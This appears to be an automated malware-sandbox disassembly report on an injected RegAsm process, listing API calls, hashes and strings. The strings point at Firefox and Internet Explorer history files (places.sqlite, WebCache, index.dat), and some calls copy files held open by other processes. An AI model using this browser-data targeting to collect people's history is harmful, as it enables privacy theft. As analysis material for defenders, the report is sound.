• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 4039892925-3369679110
• Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
• Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
• Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A

APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
• Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99

APIs
• CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CreateErrorFileLastfree
• String ID: |A
• API String ID: 981974120-1717621600
• Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
• String ID: $0.@
• API String ID: 2758756878-1896041820
• Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
• Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
• Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B

APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
• Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
• Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9

APIs
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 669240632-0
• Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
• Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
• Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
• Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA

APIs
• SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseFolderPathSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2925649097-2036018995
• Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
• Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
• Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
• Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
• Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
• Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
• Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58

APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
• GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: HandleModuleProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 116129598-3385500049
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2887208581-2114579845
APIs
• FindResourceW.KERNEL32(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
APIs
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: memcmp
• String ID: $$8
• API String ID: 1475443563-435121686
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
• CloseHandle.KERNEL32(000000FF), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
• DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839530781-0
                                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID: *.*$index.dat
                                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1156039329-0
                                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3397143404-0
                                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1125800050-0
                                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                                  • String ID: }A
                                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                  APIs
                                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                  • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                  • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: d
                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset
                                                                                                                                  • String ID: BINARY
                                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
